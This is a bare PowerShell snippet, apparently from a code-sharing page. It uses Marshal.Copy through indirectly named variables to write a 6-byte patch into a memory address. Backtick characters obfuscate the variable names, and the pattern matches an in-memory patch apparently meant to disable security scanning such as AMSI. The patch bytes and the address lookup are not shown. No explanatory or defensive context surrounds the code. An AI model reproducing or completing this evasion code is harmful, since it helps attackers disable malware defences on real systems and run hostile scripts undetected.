640f13e
9754793
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
$namespace = [System.Runtime.InteropServices.Marshal]
$method = 'Copy'
$source = ${PaT`Ch}
$startIndex = 0
$destination = ${addr`E`ss}
$length = 6
$namespace::$method($source, $startIndex, $destination, $length) |